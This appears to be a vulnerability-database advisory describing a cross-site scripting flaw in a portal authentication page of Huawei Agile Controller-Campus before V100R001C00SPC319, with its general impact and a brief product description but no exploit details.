Cross-site scripting (XSS) vulnerability in an unspecified portal authentication page in Huawei Agile Controller-Campus with software before V100R001C00SPC319 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. Huawei Agile Controller-Campus is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Huawei Agile Controller-Campus is a multi-service converged, open and compatible controller product of China Huawei (Huawei). This product provides functions such as access control, visitor management, and network-wide security assistance